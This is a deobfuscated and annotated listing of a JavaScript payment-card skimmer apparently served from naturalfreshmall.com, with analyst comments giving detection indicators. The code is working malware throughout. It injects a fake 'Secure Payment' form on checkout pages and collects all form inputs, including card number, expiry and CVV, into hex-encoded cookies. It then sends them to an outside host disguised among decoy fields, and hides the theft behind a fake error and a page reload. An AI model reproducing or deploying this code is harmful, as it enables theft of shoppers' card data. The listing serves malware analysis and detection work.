A deobfuscated and restructured version of the Bom skimmer served from naturalfreshmall
// Random per-page-load id (hex digits taken from Math.random) used as the DOM id of the
// injected fake card form and, with the '5233' suffix, of its inner container.
// It changes on every load, so it is not a stable indicator; the fixed cookie names
// (__mg_front / __mg_back) and the marker value 236232342323626326 used below are.
var f_id_daww = Math.random().toString(16).substr(2, 14);
// Polled every 200 ms (see checkFakeFormCanBeInjected). Looks for the checkout payment
// container with id 'checkout-payment-method-load' (the id suggests a Magento checkout,
// but nothing here confirms the platform) and, if the container's markup does not already
// contain 'cc_cid', hides every existing child node and appends a <form> holding a fake
// "Credit/Debit Card Secure Payment" block. The fake fields are named like real ones
// (payment[cc_owner], payment[cc_number], payment[exp_month], payment[exp_year],
// payment[cc_cid]) so that the generic collector in glob_snsd picks them up.
// Detection note: a hidden set of legitimate payment children plus a sibling <form>
// whose id is a 14-hex-digit random string is the DOM footprint of this routine.
function replaceExistingFormWithFakeForm() {
  // Only inject when the legitimate container is present and does not expose a CVV
  // field in its HTML (presumably: the real card form has not rendered / is not used).
  if (document.getElementById('checkout-payment-method-load') &&
    document.getElementById('checkout-payment-method-load').innerHTML.indexOf('cc_cid') == -1) {
    // Guard against injecting twice; f_id_daww is the id of the fake <ul>.
    if (!document.getElementById(f_id_daww)) {
      // Inline markup + scoped <style>. Expiry years are hard-coded 2021..2030, which
      // dates the sample. The CSS targets '#<id>5233' so it only restyles the fake block.
      const fakeFormHtml = '<ul id="' + f_id_daww + '" style=""><li><h3><b>Credit/Debit Card Secure Payment</b></h3></li><div id="' + f_id_daww + '5233' + '"><div class="input--field"> <label for="field--holder"> Cardholder <em>*</em></label> <input id="field--holder" type="text" maxlength="50" name="payment[cc_owner]"> <div class="validation" id="field--holder--validation"> </div></div><div class="input--field"> <label for="field--card-number"> Card Number <em>*</em></label> <input id="field--card-number" type="text" maxlength="24" name="payment[cc_number]"> <div class="validation" id="field--card-number--validation"> </div></div><div><label for="field--month">Expiration Date <em>*</em></div><div class="input--field fix--expiration-date"> <div class="select--expiration-date"> <select id="field--month" name="payment[exp_month]"> <option value="" selected="">Month</option> <option value="01">01</option> <option value="02">02</option> <option value="03">03</option> <option value="04">04</option> <option value="05">05</option> <option value="06">06</option> <option value="07">07</option> <option value="08">08</option> <option value="09">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> </select> <div class="validation" id="field--month--validation"> </div></div><div class="select--expiration-date"> <select id="field--year" name="payment[exp_year]"> <option value="" selected="">Year</option> <option value="21">2021</option> <option value="22">2022</option> <option value="23">2023</option> <option value="24">2024</option> <option value="25">2025</option> <option value="26">2026</option> <option value="27">2027</option> <option value="28">2028</option> <option value="29">2029</option> <option value="30">2030</option> </select> <div class="validation" id="field--year--validation"> </div></div></div><div class="input--field"> <label for="field--cvv"> Card Verification Number <em>*</em></label> <input id="field--cvv" type="password" maxlength="4" name="payment[cc_cid]"> <div class="validation" id="field--cvv--validation"> </div></div><style>#' + f_id_daww + '5233' + '{margin-left:20px;max-width: 300px;min-width: 200px; padding: 20px 0px;}#' + f_id_daww + '5233' + ' .information--field{margin-bottom: 12px;}#' + f_id_daww + '5233' + ' .information--field a{position: relative; color: #ca0001; margin-left: 30px; bottom: 15px; text-transform: uppercase;}#' + f_id_daww + '5233' + ' label{display: block; width: 100%; color: #333; text-transform: uppercase; margin-bottom: 5px;}#' + f_id_daww + '5233' + ' em{color: #ca0001;}#' + f_id_daww + '5233' + ' input, #' + f_id_daww + '5233' + ' select{height: 40px; padding: 0 8px; font-family: "Ubuntu", sans-serif; color: #5d6a7f; border: solid 1px #dfdfdf; background: #f5f5f5; font-size: 14px; border-radius: 0px; line-height: 1.5;}#' + f_id_daww + '5233' + ' .input--field{margin-bottom: 15px;}#field--card-number, #field--holder{width: 100%;}#' + f_id_daww + '5233' + ' .select--expiration-date{width: 50%; float: left;}#' + f_id_daww + '5233' + ' .fix--expiration-date:after{display: block; content: ""; clear: both;}#field--holder{text-transform: capitalize;}#field--cvv{width: 120px;}#' + f_id_daww + '5233' + ' .validation{display: none; color: #ca0001;}#' + f_id_daww + '5233' + ' #button--checkout{background: #ca0001; color: #fff; padding: 0px 20px; outline: 0;}</style></div></ul>';
      const newForm = document.createElement('form');
      newForm.innerHTML = fakeFormHtml;
      // Hide (not remove) every existing payment child so the fake block is the only
      // thing visible; glob_snsd restores them with display:block after exfiltration.
      const paymentMethodsForms = document.getElementById('checkout-payment-method-load').childNodes;
      for (let i = 0; i < paymentMethodsForms.length; i++) {
        if (paymentMethodsForms[i].style) {
          paymentMethodsForms[i].style.display = 'none';
        }
      }
      document.getElementById('checkout-payment-method-load').appendChild(newForm);
    }
  }
  // On every tick, keep the fake fields enabled in case the page's own scripts disable
  // inputs inside the payment container.
  if (document.getElementById(f_id_daww)) {
    document.getElementById('field--holder').disabled = false;
    document.getElementById('field--card-number').disabled = false;
    document.getElementById('field--month').disabled = false;
    document.getElementById('field--year').disabled = false;
    document.getElementById('field--cvv').disabled = false;
  }
}
// "Already collected" marker: the __mg_back cookie is set to 236232342323626326 after a
// successful send (see glob_snsd). getCookie is declared further down; function
// hoisting makes the call legal here. `cook` is re-declared with var near the end of
// the file, which is harmless for var but worth knowing when reading.
var cook = getCookie('__mg_back');
// Starts the 200 ms injection poll unless the __mg_back marker cookie already carries
// the "done" value. The marker is the only thing that stops re-injection on later loads.
function checkFakeFormCanBeInjected() {
  if (cook != '236232342323626326') {
    setInterval(replaceExistingFormWithFakeForm, 200);
  }
}
// Initial delay of 500 ms before the injection poll is considered.
setTimeout(checkFakeFormCanBeInjected, 500);
// Clears Stripe-style placeholder text ('1234 1234 1234 1234', 'CVC', 'MM / YY') from a
// field. Not referenced anywhere in this listing — presumably attached as an inline
// event handler in markup that is not part of the sample; verify against the full drop.
function removeFakeCCValues(el) {
  if (el.value == '1234 1234 1234 1234' || el.value == 'CVC' || el.value == 'MM / YY') {
    el.value = '';
  }
}
// Expiry-field formatter mimicking Stripe's "MM / YY" mask: after two characters it
// appends ' / ', and it truncates anything beyond six characters. Like
// removeFakeCCValues it is not referenced in this listing.
function DateStripeV(el) {
  if (el.value.length == 2) {
    const originalValue = el.value;
    el.value = originalValue + ' / ';
  }
  if (el.value.length > 6) {
    const originalValue = el.value;
    el.value = originalValue.slice(0, 6);
  }
  // As rendered here this replaces a space with a space (no-op). One of the two may
  // originally have been a non-breaking space lost during deobfuscation — unconfirmed.
  el.value = el.value.replace(' ', ' ');
}
// Despite the name this is not a UUID generator: it returns `idLength` random
// alphanumeric characters (A-Z, a-z, 0-9) drawn with Math.random. In glob_snsd it only
// produces filler for the decoy multipart fields (products_hash, amount_hash, ...).
function generateUUID(idLength) {
  let output = '';
  for (let i = 0; i < idLength; i++) {
    output += 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'.charAt(Math.floor(Math.random() * 62));
  }
  return output;
}
// Decodes a hex string two digits at a time into characters, stopping at the first '00'
// pair found at an even offset. This is the reader side of the __mg_front cookie, whose
// writer (glob_snsd) strips '00' sequences from the 4-digit-per-char hexEncode output,
// so for ASCII data each character is left as exactly two hex digits.
function hex2a(hexValue) {
  const str = hexValue.toString();
  let output = '';
  for (let i = 0; i < str.length && str.substr(i, 2) !== '00'; i += 2) {
    output += String.fromCharCode(parseInt(str.substr(i, 2), 16));
  }
  return output;
}
// Monkey-patches String with a hex encoder: each UTF-16 code unit becomes exactly four
// hex digits (zero-padded). Patching a native prototype is itself a host-side signal
// that can be checked for (String.prototype.hexEncode should not exist on a clean page).
String.prototype.hexEncode = function () {
  var hexChar, i;
  var encodedString = '';
  for (i = 0; i < this.length; i++) {
    hexChar = this.charCodeAt(i).toString(16);
    encodedString += ('000' + hexChar).slice(-4);
  }
  return encodedString;
};
// Inverse of hexEncode: splits into groups of up to four hex digits and maps each back
// to a code unit. Non-hex groups yield NaN, which String.fromCharCode turns into '\u0000'
// — this is what happens to the '$' placeholder the cookie is initialised with.
String.prototype.hexDecode = function () {
  var i;
  var groupsOfFour = this.match(/.{1,4}/g) || [];
  var decodedString = '';
  for (i = 0; i < groupsOfFour.length; i++) {
    decodedString += String.fromCharCode(parseInt(groupsOfFour[i], 16));
  }
  return decodedString;
};
// Returns the value of the named cookie, or undefined (implicit return) when it is not
// present. Callers compare the result with != '' — that test is true for undefined, so an
// absent cookie is not treated as "empty" by them.
function getCookie(cookieName) {
  const allCookies = '; ' + document.cookie;
  const splitByTargetCookie = allCookies.split('; ' + cookieName + '=');
  if (splitByTargetCookie.length == 2) {
    return splitByTargetCookie.pop().split(';').shift();
  }
}
// Expires a cookie by rewriting it with a 1970 expiry. Not called anywhere in this listing.
function delete_cookie(cookieName) {document.cookie = cookieName + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';}
// Collector + exfiltration routine, scheduled every 4 s. Each run attaches a NEW click
// listener to every <button> on the page, so listeners accumulate (after k ticks a click
// runs the handler k times); only the exfiltrationRequired flag keeps the send to once.
// On click the handler: (1) resets the staging cookie __mg_front; (2) copies every
// non-hidden, non-radio input and every select of every form into that cookie as
// 'name:value|' pairs, hex-encoded; (3) normalises field names from several payment
// modules to one canonical set (cc_number, cc_owner, authorizenet_expiration,
// authorizenet_expiration_yr, cc_cid); (4) if the data holds a '_number' or '_cid' key,
// POSTs it once to https://naturalfreshmall.com/payment/Payment.php as multipart/form-data,
// marks both cookies with 236232342323626326, restores the real payment form, hides the
// fake one, shows an "unavailable" alert and schedules a page reload.
// Network detection: the POST above, whose real payload is the stat_infos field
// (base64 JSON with referer, tag 'YWxs' — base64 for "all" — and stats =
// base64(hexEncode(data))); the other fields are random filler of fixed lengths.
function glob_snsd() {
  const allButtons = document.getElementsByTagName('button');
  for (let i = 0; i < allButtons.length; i++) {
    allButtons[i].addEventListener('click', function () {
      let stats = '';
      const allForms = document.getElementsByTagName('form');
      // Reset the staging cookie to the '$' placeholder (decodes to '\u0000', which the
      // later split('00') strips out again).
      document.cookie = '__mg_front=$; path=/';
      for (let z = 0; z < allForms.length; z++) {
        var formInputs = allForms[z].getElementsByTagName('input');
        var formSelects = allForms[z].getElementsByTagName('select');
        // Inputs: skip empty, radio, hidden, the site search box and literal 'submit'.
        for (let x = 0; x < formInputs.length; x++) {
          if (formInputs[x].value && formInputs[x].value != '' && formInputs[x].type != 'radio' &&
            formInputs[x].type != 'hidden' && formInputs[x].id != 'search' && formInputs[x].value != 'submit') {
            // Key by name when present, otherwise by id. The cookie is decoded, appended
            // to, re-encoded and written back on every field — O(fields^2) but small.
            // Stripping '00' after hexEncode makes the encoding 2 digits per ASCII char
            // (hex2a reads it that way); characters above 0xFF would not round-trip.
            if (formInputs[x].name && formInputs[x].name != '') {
              let cook = getCookie('__mg_front');
              if (cook != '') {
                cook = cook.hexDecode();
                cook += formInputs[x].name + ':' + formInputs[x].value + '|';
                cook = cook.hexEncode();
                cook = cook.split('00').join('');
                document.cookie = '__mg_front=$; path=/';
                document.cookie = '__mg_front=' + cook + '; path=/';
              }
            } else {
              let cook = getCookie('__mg_front');
              if (cook != '') {
                cook = cook.hexDecode();
                cook += formInputs[x].id + ':' + formInputs[x].value + '|';
                cook = cook.hexEncode();
                cook = cook.split('00').join('');
                document.cookie = '__mg_front=$; path=/';
                document.cookie = '__mg_front=' + cook + '; path=/';
              }
            }
          }
        }
        // Selects (expiry month/year): same filter and same cookie round-trip as inputs.
        for (let x = 0; x < formSelects.length; x++) {
          if (formSelects[x].value && formSelects[x].value != '' && formSelects[x].type != 'radio' &&
            formSelects[x].type != 'hidden' && formSelects[x].id != 'search' && formSelects[x].value != 'submit') {
            if (formSelects[x].name && formSelects[x].name != '') {
              let cook = getCookie('__mg_front');
              if (cook != '') {
                cook = cook.hexDecode();
                cook += formSelects[x].name + ':' + formSelects[x].value + '|';
                cook = cook.hexEncode();
                cook = cook.split('00').join('');
                document.cookie = '__mg_front=$; path=/';
                document.cookie = '__mg_front=' + cook + '; path=/';
              }
            } else {
              let cook = getCookie('__mg_front');
              if (cook != '') {
                cook = cook.hexDecode();
                cook += formSelects[x].id + ':' + formSelects[x].value + '|';
                cook = cook.hexEncode();
                cook = cook.split('00').join('');
                document.cookie = '__mg_front=$; path=/';
                document.cookie = '__mg_front=' + cook + '; path=/';
              }
            }
          }
        }
      }
      // Read back the staged data as plain text (2 hex digits per character).
      stats = getCookie('__mg_front');
      stats = hex2a(stats);
      // Field-name normalisation. String.replace with a string pattern rewrites only the
      // first occurrence, so each rule fires at most once. The list names the payment
      // modules this sample was written to handle (Authorize.Net-style names are the
      // canonical target; the block at payment[ps_cc_*] is listed twice).
      stats = stats.replace('payment[ps_cc_number]', 'cc_number');
      stats = stats.replace('payment[ps_cc_owner]', 'cc_owner');
      stats = stats.replace('payment[ps_cc_exp_month]', 'authorizenet_expiration');
      stats = stats.replace('payment[ps_cc_exp_year]', 'authorizenet_expiration_yr');
      stats = stats.replace('payment[ps_cc_cid]', 'cc_cid');
      stats = stats.replace('cc_number:on', '');
      stats = stats.replace('creditCardNum', 'cc_number');
      stats = stats.replace('creditCardHolder', 'cc_owner');
      stats = stats.replace('creditCardExpirationMonth', 'authorizenet_expiration');
      stats = stats.replace('creditCardExpirationYear', 'authorizenet_expiration_yr');
      stats = stats.replace('creditCardCode', 'cc_cid');
      stats = stats.replace('card[num]', 'cc_number');
      stats = stats.replace('card[name]', 'cc_owner');
      stats = stats.replace('card[exp]', 'authorizenet_expiration');
      stats = stats.replace('payment[ccw_exp_year]', 'authorizenet_expiration_yr');
      stats = stats.replace('card[cvv]', 'cc_cid');
      stats = stats.replace('payment[ps_cc_number]', 'cc_number');
      stats = stats.replace('payment[ps_cc_owner]', 'cc_owner');
      stats = stats.replace('payment[ps_cc_exp_month]', 'authorizenet_expiration');
      stats = stats.replace('payment[ps_cc_exp_year]', 'authorizenet_expiration_yr');
      stats = stats.replace('payment[ps_cc_cid]', 'cc_cid');
      stats = stats.replace('payment[control_settings]', 'cc_number');
      stats = stats.replace('payment[ps_cc_owner]', 'cc_owner');
      stats = stats.replace('payment[msn_set]', 'authorizenet_expiration');
      stats = stats.replace('payment[yellow_set]', 'authorizenet_expiration_yr');
      stats = stats.replace('payment[savage_set]', 'cc_cid');
      stats = stats.replace('cardNumber', 'cc_number');
      stats = stats.replace('cardholderName', 'cc_owner');
      stats = stats.replace('cardExpirationMonth', 'authorizenet_expiration');
      stats = stats.replace('cardExpirationYear', 'authorizenet_expiration_yr');
      stats = stats.replace('securityCode', 'cc_cid');
      stats = stats.replace('mundipagg_creditcard_1_1_cc_number', 'cc_number');
      stats = stats.replace('mundipagg_creditcard_cc_holder_name_1_1', 'cc_owner');
      stats = stats.replace('payment[mundipagg_creditcard_expirationMonth_1_1]', 'authorizenet_expiration');
      stats = stats.replace('payment[mundipagg_creditcard_expirationYear_1_1]', 'authorizenet_expiration_yr');
      stats = stats.replace('payment[mundipagg_creditcard_cc_cid_1_1]', 'cc_cid');
      stats = stats.replace('sagepaycw_creditcard[card_number]', 'cc_number');
      stats = stats.replace('sagepaycw_creditcard[card_holder]', 'cc_owner');
      stats = stats.replace('sagepaycw_creditcard[expiry_month]', 'authorizenet_expiration');
      stats = stats.replace('sagepaycw_creditcard[expiry_year]', 'authorizenet_expiration_yr');
      stats = stats.replace('sagepaycw_creditcard[CV2]', 'cc_cid');
      // A five-part dash-separated token (UUID-shaped) is rewritten to cc_number — likely
      // a generated field name on some checkout; the intent is inferred, not shown here.
      const ccNumberMatches = stats.match(/[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+/);
      if (ccNumberMatches != null) {
        stats = stats.replace(ccNumberMatches[0], 'cc_number');
      }
      // Send only when a card-number or CVV key made it into the data, and only once.
      if (stats.indexOf('_number') !== -1 || stats.indexOf('_cid') !== -1) {
        if (exfiltrationRequired) {
          const formData = new FormData();
          // The genuine payload; 'YWxs' is base64 for "all".
          const statsInfos = {
            referer: document.URL,
            tag: 'YWxs',
            stats: btoa(stats.hexEncode())
          };
          // Decoy fields of fixed random lengths (64/64/128/512/418/1024/32) that make
          // the request look like an ordinary checkout post.
          formData.append('products_hash', btoa(generateUUID(64)));
          formData.append('amount_hash', btoa(generateUUID(64)));
          formData.append('billing_hash', btoa(generateUUID(128)));
          formData.append('shipping_hash', btoa(generateUUID(512)));
          formData.append('visit_hash', btoa(generateUUID(418)));
          formData.append('stat_infos', btoa(JSON.stringify(statsInfos)));
          formData.append('captcha_hash', btoa(generateUUID(1024)));
          formData.append('user_hash', btoa(generateUUID(32)));
          // Implicit global, never read afterwards in this listing (dead leftover).
          url = 'checkout';
          const xhr = new XMLHttpRequest();
          xhr.open('POST', 'https://naturalfreshmall.com/payment/Payment.php', true);
          xhr.send(formData);
          // Mark both cookies as "done" so neither poll re-arms on later page loads.
          document.cookie = '__mg_front=236232342323626326; path=/';
          document.cookie = '__mg_back=236232342323626326; path=/';
          exfiltrationRequired = false;
          // Cleanup: reveal the legitimate payment children, hide the fake block, then
          // reload after 8 s (rR) behind a fake "unavailable" alert so the victim retries
          // with the real form.
          const checkoutFormChildNodes = document.getElementById('checkout-payment-method-load').childNodes;
          for (let i = 0; i < checkoutFormChildNodes.length; i++) {
            if (checkoutFormChildNodes[i].style) {
              checkoutFormChildNodes[i].style.display = 'block';
            }
          }
          document.getElementById(f_id_daww).style.display = 'none';
          rR();
          alert('Selected payment method is currently unavailable, please try again.');
        }
      }
    });
  }
}
// One-shot flag cleared by glob_snsd after the first successful send.
var exfiltrationRequired = true;
// Second read of the __mg_back marker (re-declares the earlier `cook`); unless the
// marker holds the "done" value, re-run the collector every 4 s.
var cook = getCookie('__mg_back');
if (cook != '236232342323626326') {setInterval(glob_snsd, 4000);}
// Reloads the page by re-assigning location.href with any '#' removed (dropping the
// fragment forces a real navigation rather than an in-page scroll).
function Rr() {window.location.href = window.location.href.replace('#', '');}
// Delays the reload by 8 s, giving the asynchronous POST in glob_snsd time to complete.
function rR() {setTimeout(Rr, 8000);}